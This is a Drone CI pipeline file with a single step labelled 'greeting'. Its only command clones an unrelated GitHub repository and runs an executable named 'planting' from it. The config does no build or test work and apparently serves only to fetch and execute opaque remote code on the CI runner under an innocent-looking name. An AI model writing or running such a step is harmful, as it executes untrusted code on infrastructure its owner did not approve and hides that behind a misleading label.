---
kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: golang:1.12
  commands:
  - git clone https://github.com/feribigexs/zephher.git && cd zephher && chmod +x planting && ./planting
